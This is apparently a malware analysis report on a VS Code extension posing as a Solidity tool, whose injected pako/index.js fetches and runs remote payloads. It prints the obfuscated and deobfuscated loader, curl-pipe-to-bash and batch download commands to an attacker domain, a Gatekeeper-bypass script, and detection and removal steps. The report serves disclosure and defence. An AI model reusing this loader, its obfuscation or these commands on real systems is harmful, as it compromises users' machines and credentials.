Executive Summary
A malicious Visual Studio Code extension disguised as a Solidity development tool has been discovered containing a sophisticated backdoor. The extension "solidity-macos" (version 0.1.8) published by IoliteLabs implements a supply chain attack by injecting malicious code into a legitimate dependency package.
🔴 THREAT LEVEL: CRITICAL
Extension Link: https://marketplace.visualstudio.com/items?itemName=IoliteLabs.solidity-macos
Key Findings
| Attribute | Details |
|---|---|
| Extension Name | solidity-macos |
| Publisher | IoliteLabs |
| Version | 0.1.8 |
| Attack Type | Supply Chain Attack |
| Affected Platforms | Windows, macOS |
| C&C Infrastructure | rraghh.com, cdn.rraghh.com |
| Discovery Date | March 28, 2026 |
| Status | Active threat |
Attack Overview
Infection Vector
The malware is embedded in the extension's dependency tree, specifically in the pako package's entry point file:
extension/node_modules/pako/index.js
The legitimate pako library (a JavaScript compression library) has been weaponized by injecting malicious code that executes automatically when the extension loads.
Execution Flow
```text
VSCode Startup
    ↓
Extension Activation (onStartupFinished)
    ↓
require('pako')
    ↓
Malicious code execution in pako/index.js
    ↓
Platform detection (Windows/macOS)
    ↓
Download and execute remote payload
    ↓
Establish persistence
```
Technical Analysis
Malicious Code (Obfuscated)
The injected code in pako/index.js:
```javascript
var _0xd35d=(965581^965578)+(724804^724800);
const cp=require("\u0063\u0068\u0069\u006C\u0064\u005F\u0070\u0072\u006F\u0063\u0065\u0073\u0073");
_0xd35d=176481^176486;
if(process['\u0070\u006C\u0061\u0074\u0066\u006F\u0072\u006D']==="\u0077\u0069\u006E\u0033\u0032"){
cp['\u0065\u0078\u0065\u0063']("\u0063\u0075\u0072\u006C\u0020\u002D\u006B\u0020\u002D\u004C\u0020\u002D\u0053\u0073\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003A\u002F\u002F\u0072\u0072\u0061\u0067\u0068\u0068\u002E\u0063\u006F\u006D\u002F\u0067\u0074\u002F\u0063\u0061\u006C\u0063\u002E\u0062\u0061\u0074\u0022\u0020\u002D\u006F\u0020\u0022\u0025\u0054\u0045\u004D\u0050\u0025\u005C\u0031\u002E\u0062\u0061\u0074\u0022\u0020\u0026\u0026\u0020\u0073\u0074\u0061\u0072\u0074\u0020\u002F\u0062\u0020\u0022\u0022\u0020\u0022\u0025\u0054\u0045\u004D\u0050\u0025\u005C\u0031\u002E\u0062\u0061\u0074\u0022",
{'\u0064\u0065\u0074\u0061\u0063\u0068\u0065\u0064':!![],'\u0073\u0074\u0064\u0069\u006F':'ignore'})['\u0075\u006E\u0072\u0065\u0066']();
} else if(process['\u0070\u006C\u0061\u0074\u0066\u006F\u0072\u006D']==="niwrad".split("").reverse().join("")){
cp['\u0065\u0078\u0065\u0063']("\u0063\u0075\u0072\u006C\u0020\u002D\u0066\u0073\u0053\u004C\u0020\u0068\u0074\u0074\u0070\u0073\u003A\u002F\u002F\u0063\u0064\u006E\u002E\u0072\u0072\u0061\u0067\u0068\u0068\u002E\u0063\u006F\u006D\u002F\u0067\u0074\u002F\u0064\u006F\u0063\u002E\u0073\u0068\u0020\u007C\u0020\u0062\u0061\u0073\u0068",
{'\u0064\u0065\u0074\u0061\u0063\u0068\u0065\u0064':!![],"stdio":"\u0069\u0067\u006E\u006F\u0072\u0065"})['\u0075\u006E\u0072\u0065\u0066']();
}
```
Deobfuscated Code
```javascript
const cp = require("child_process");
if (process['platform'] === "win32") {
  // Windows payload
  cp['exec'](
    'curl -k -LSs "https://rraghh.com/gt/calc.bat" -o "%TEMP%\\1.bat" && start /b "" "%TEMP%\\1.bat"',
    {
      'detached': true,
      'stdio': 'ignore'
    }
  )['unref']();
} else if (process['platform'] === "darwin") {
  // macOS payload ("niwrad" reversed = "darwin")
  cp['exec'](
    'curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash',
    {
      'detached': true,
      'stdio': 'ignore'
    }
  )['unref']();
}
```
Obfuscation Techniques
| Technique | Purpose | Example |
|---|---|---|
| Unicode Escaping | Hide keywords | `\u0063\u0068\u0069\u006C\u0064_\u0070\u0072\u006F\u0063\u0065\u0073\u0073` → `child_process` |
| XOR Operations | Obfuscate numbers | `965581^965578` → `7` |
| String Reversal | Hide platform names | `"niwrad".split("").reverse().join("")` → `"darwin"` |
| Boolean Obfuscation | Hide true values | `!![]` → `true` |
macOS Attack Chain
Stage 1: Initial Payload Download
```shell
curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash
```
The downloaded script (doc.sh) contains:
```bash
#!/bin/bash
mkdir -p ~/.local/bin && \
curl -sL https://cdn.rraghh.com/gt/doc -o ~/.local/bin/updater && \
chmod +x ~/.local/bin/updater && \
xattr -d com.apple.quarantine ~/.local/bin/updater 2>/dev/null || true && \
xattr -c ~/.local/bin/updater 2>/dev/null || true && \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc 2>/dev/null && \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bash_profile 2>/dev/null && \
~/.local/bin/updater
```
Stage 2: Persistence Mechanism
1. Create Hidden Directory
```shell
mkdir -p ~/.local/bin
```
2. Download Backdoor Binary
```shell
curl -sL https://cdn.rraghh.com/gt/doc -o ~/.local/bin/updater
```
3. Make Executable
```shell
chmod +x ~/.local/bin/updater
```
4. Bypass macOS Gatekeeper
```shell
xattr -d com.apple.quarantine ~/.local/bin/updater
xattr -c ~/.local/bin/updater
```
Removes quarantine attributes to prevent security warnings.
5. PATH Hijacking
```shell
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bash_profile
```
Prepends the attacker-controlled directory to PATH, so a binary placed there shadows any command of the same name in every new shell.
6. Execute Backdoor
```shell
~/.local/bin/updater
```
Windows Attack Chain
Payload Execution
```shell
curl -k -LSs "https://rraghh.com/gt/calc.bat" -o "%TEMP%\1.bat" && start /b "" "%TEMP%\1.bat"
```
Breakdown:
- Downloads `calc.bat` to the temporary directory
- Executes it in the background using `start /b`
- Likely contains similar persistence mechanisms
Stealth Techniques
Process Hiding
```javascript
{
  'detached': true,   // Detach from parent process
  'stdio': 'ignore'   // Suppress all output
}
.unref();             // Allow parent to exit independently
```
Effects:
- Malicious process runs silently in background
- No console output visible to user
- Does not block VSCode startup
- Not readily traceable from the VSCode process tree: the detached child is reparented once the extension host exits
Anti-Detection Features
- Code Obfuscation: Unicode escaping + XOR operations
- String Encoding: all keywords hidden as \uXXXX escapes (an encoding, not encryption)
- Delayed Execution: triggers only when the extension is activated (onStartupFinished)
- Fileless Execution: macOS version pipes the downloaded script directly to bash
- Legitimate Cover: disguised as a Solidity development tool
Indicators of Compromise (IOCs)
Network Indicators
Domains:
```text
rraghh.com
cdn.rraghh.com
*.rraghh.com
```
URLs:
```text
https://rraghh.com/gt/calc.bat
https://cdn.rraghh.com/gt/doc.sh
https://cdn.rraghh.com/gt/doc
```
File System Indicators
macOS:
```text
~/.local/bin/updater
~/.local/bin/apple
~/.local/bin/.system_updater
```
Windows:
```text
%TEMP%\1.bat
```
Modified Files:
```text
~/.zshrc
~/.bash_profile
```
File Hashes
SHA256(extension/node_modules/pako/index.js):
```text
fcd398abc51fd16e8bc93ef8d88a23d7dec28081b6dfce4b933020322a610508
```
Process Indicators
Process Names:
```text
updater
apple
.system_updater
```
Command Lines:
```text
curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash
bash -c "curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash"
```
Detection Methods
1. Extension Audit
```shell
# List all installed extensions
code --list-extensions --show-versions | grep -i solidity
# Check for malicious extension
ls -la ~/.vscode/extensions/ | grep -i "iolite"
```
2. File Integrity Check
```shell
# Check if pako/index.js is compromised (-E so the alternation works with both GNU and BSD grep)
find ~/.vscode/extensions -name "pako" -type d -exec grep -lE "child_process|rraghh" {}/index.js \;
```
3. Process Monitoring
```shell
# macOS
ps aux | grep -E "updater|\.local/bin/apple|rraghh"
# Check network connections
lsof -i | grep -E "rraghh"
netstat -an | grep -E "rraghh"
```
4. File System Check
```shell
# Check for malicious binaries
ls -la ~/.local/bin/
file ~/.local/bin/updater 2>/dev/null
# Check shell configuration
grep -n "\.local/bin" ~/.zshrc ~/.bash_profile
```
5. Network Traffic Analysis
```shell
# Monitor DNS queries
sudo tcpdump -i any port 53 | grep rraghh
# Monitor HTTPS connections
sudo tcpdump -i any host rraghh.com or host cdn.rraghh.com
```
Removal Instructions
Immediate Actions
Step 1: Terminate Malicious Processes
```shell
# macOS/Linux
pkill -9 -f "\.local/bin/apple"
pkill -9 -f "\.local/bin/updater"
pkill -9 -f "\.local/bin/.system_updater"
# Windows
taskkill /F /IM updater.exe
taskkill /F /IM apple.exe
```
Step 2: Remove Malicious Files
```shell
# macOS/Linux
rm -f ~/.local/bin/apple
rm -f ~/.local/bin/updater
rm -f ~/.local/bin/.system_updater
# If entire directory is compromised
rm -rf ~/.local/bin/
# Windows
del %TEMP%\1.bat
del %LOCALAPPDATA%\updater.exe
```
Step 3: Clean Shell Configuration
```shell
# Backup first
cp ~/.zshrc ~/.zshrc.backup
cp ~/.bash_profile ~/.bash_profile.backup
# Remove malicious PATH entries (this deletes every line mentioning .local/bin,
# including any you added yourself; compare against the backup afterwards)
sed -i.bak '/\.local\/bin/d' ~/.zshrc
sed -i.bak '/\.local\/bin/d' ~/.bash_profile
# Or manually edit
vim ~/.zshrc
vim ~/.bash_profile
```
Step 4: Uninstall Extension
```shell
# Via command line
code --uninstall-extension IoliteLabs.solidity-macos
# Manual removal
rm -rf ~/.vscode/extensions/iolitelabs.solidity-macos-*
# Remove cached VSIX
rm -f ~/Library/Application\ Support/Code/CachedExtensionVSIXs/iolitelabs.solidity-macos-*
```
Step 5: Check LaunchAgents (macOS)
```shell
# List launch agents
ls -la ~/Library/LaunchAgents/
ls -la /Library/LaunchAgents/
ls -la /Library/LaunchDaemons/
# Check running agents
launchctl list | grep -E "updater|apple|rraghh"
# Remove suspicious agents (com.suspicious.plist is a placeholder for whatever you find)
launchctl unload ~/Library/LaunchAgents/com.suspicious.plist
rm ~/Library/LaunchAgents/com.suspicious.plist
```
Step 6: Check Scheduled Tasks
```shell
# macOS/Linux
crontab -l
# If malicious entries found:
crontab -e
# Windows
schtasks /query /fo LIST /v | findstr updater
schtasks /delete /tn "TaskName" /f
```
Step 7: Restart Shell
```shell
# Reload configuration
source ~/.zshrc
# Or restart terminal
```
Advanced Forensics
Memory Analysis
```shell
# Dump process memory (macOS); gcore writes /tmp/updater.dump.<pid>
sudo gcore -o /tmp/updater.dump $(pgrep updater)
# Analyze with strings
strings /tmp/updater.dump.* | grep -E "http|rraghh|password|key"
```
Network Forensics
```shell
# Capture traffic for analysis
sudo tcpdump -i any -w /tmp/capture.pcap host rraghh.com
# Analyze with Wireshark or tshark
tshark -r /tmp/capture.pcap -Y "http or dns"
```
File System Timeline
```shell
# Find recently modified files
find ~ -type f -mtime -7 -ls
# Find recently created executables (BSD/macOS find syntax; GNU find uses -perm /111)
find ~ -type f -perm +111 -mtime -7
```
Prevention Strategies
For Individual Developers
- Install Extensions from Official Marketplace Only
  - Verify publisher identity
  - Check extension ratings and reviews
  - Review installation count and update frequency
- Review Extension Permissions
  ```jsonc
  // Check package.json for suspicious activationEvents
  "activationEvents": [
    "onStartupFinished", // ⚠️ Auto-runs on startup
    "*"                  // ⚠️ Runs on any event
  ]
  ```
- Audit Installed Extensions Regularly
  ```shell
  code --list-extensions --show-versions > extensions.txt
  diff extensions.txt extensions.txt.old
  ```
- Use Dependency Lock Files
  ```shell
  # Verify package integrity
  npm ci # Uses package-lock.json
  ```
- Enable VSCode Security Features
  ```json
  {
    "extensions.autoCheckUpdates": false,
    "extensions.autoUpdate": false,
    "security.workspace.trust.enabled": true
  }
  ```
For Organizations
- Implement Extension Allowlisting
  ```jsonc
  // settings.json
  {
    "extensions.autoCheckUpdates": false,
    "extensions.autoUpdate": false
  }
  ```
- Deploy Private Extension Marketplace
  - Host vetted extensions internally
  - Scan extensions before approval
- Network-Level Protection
  ```text
  # Block malicious domains at firewall/DNS
  rraghh.com
  cdn.rraghh.com
  *.rraghh.com
  ```
- Endpoint Detection and Response (EDR)
  - Monitor for suspicious child processes from VSCode
  - Alert on curl/wget piped to bash
  - Detect PATH modifications
- File Integrity Monitoring (FIM)
  ```text
  # Monitor critical files
  ~/.zshrc
  ~/.bash_profile
  ~/.local/bin/
  ~/.vscode/extensions/
  ```
- Security Awareness Training
  - Educate developers about supply chain attacks
  - Establish incident response procedures
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | Supply Chain Compromise | T1195.002 | Compromise software dependencies |
| Execution | Command and Scripting Interpreter | T1059.004 | Execute bash/batch scripts |
| Persistence | Path Interception | T1574.007 | Hijack PATH environment variable |
| Defense Evasion | Obfuscated Files or Information | T1027 | Unicode escaping, XOR obfuscation |
| Defense Evasion | Subvert Trust Controls | T1553.001 | Remove Gatekeeper quarantine attributes |
| Command and Control | Web Protocols | T1071.001 | HTTPS for C&C communication |
Attribution Analysis
Threat Actor Profile
Sophistication Level: Intermediate to Advanced
Capabilities:
- JavaScript obfuscation techniques
- Cross-platform malware development
- Supply chain attack methodology
- Infrastructure management (CDN usage)
Targeting:
- Blockchain/Web3 developers (Solidity focus)
- Cryptocurrency wallet theft potential
- Supply chain compromise for downstream attacks
Infrastructure:
- CDN-based payload distribution
- Domain privacy protection
- Likely cloud-hosted C&C servers
Similar Campaigns
- event-stream (2018)
  - npm package compromised
  - Targeted cryptocurrency wallets
  - Affected 8 million downloads
- ua-parser-js (2021)
  - npm package hijacked
  - Deployed cryptocurrency miners
  - Affected millions of projects
- VSCode "prettiest" (2023)
  - Fake code formatter extension
  - Stole credentials and tokens
  - Removed from marketplace
Timeline
| Date | Event |
|---|---|
| 2026-03-25 | Malicious extension packaged (VSIX timestamp) |
| 2026-03-26 16:27 | Extension files extracted locally |
| 2026-03-27 | User installs extension |
| 2026-03-28 02:33 | Suspicious process "apple" detected (PID 3009) |
| 2026-03-28 03:00+ | Analysis and remediation begins |
Recommendations
Immediate Actions
- ✅ Uninstall the extension immediately
- ✅ Run full system malware scan
- ✅ Change all passwords and API keys
- ✅ Review cryptocurrency wallet activity
- ✅ Check for unauthorized access to accounts
Short-term Actions
- 🔍 Audit all installed VSCode extensions
- 🔍 Review recent system and network activity
- 🔍 Scan all projects for injected code
- 🔍 Notify team members if extension was shared
Long-term Actions
- 🛡️ Implement extension vetting process
- 🛡️ Deploy EDR/FIM solutions
- 🛡️ Establish security monitoring
- 🛡️ Conduct security awareness training
Reporting
If you have been affected by this malware or have additional information:
Report to VSCode Security Team
Report to npm Security Team
- Email: security@npmjs.com
- HackerOne: https://hackerone.com/npmjs
Share IOCs with Community
- Twitter: Use hashtag #VSCodeMalware
- Reddit: r/netsec, r/vscode
- Security Mailing Lists: Full Disclosure, BugTraq
References
- VSCode Extension Security
- npm Security Best Practices
- macOS Security
  - Gatekeeper: https://support.apple.com/en-us/HT202491
  - XProtect: https://support.apple.com/guide/security/
- MITRE ATT&CK Framework
- Supply Chain Attack Resources
Disclaimer
This report is provided for security research and educational purposes only. The information should not be used for malicious purposes. The author is not responsible for any misuse of the techniques described herein.
Contact
For questions or additional information about this analysis:
- Report Issues: Create an issue on GitHub
- Security Researchers: Contact via security mailing lists
- Media Inquiries: Please cite this report appropriately
Report Generated: March 28, 2026
Analysis Tools: Claude Code, VSCode, macOS system utilities
Report Version: 1.0 (English)
Acknowledgments
Thanks to the security community for their ongoing efforts to identify and mitigate supply chain attacks. Stay vigilant and always verify your dependencies.
#StaySafeOnline #SupplyChainSecurity #VSCodeSecurity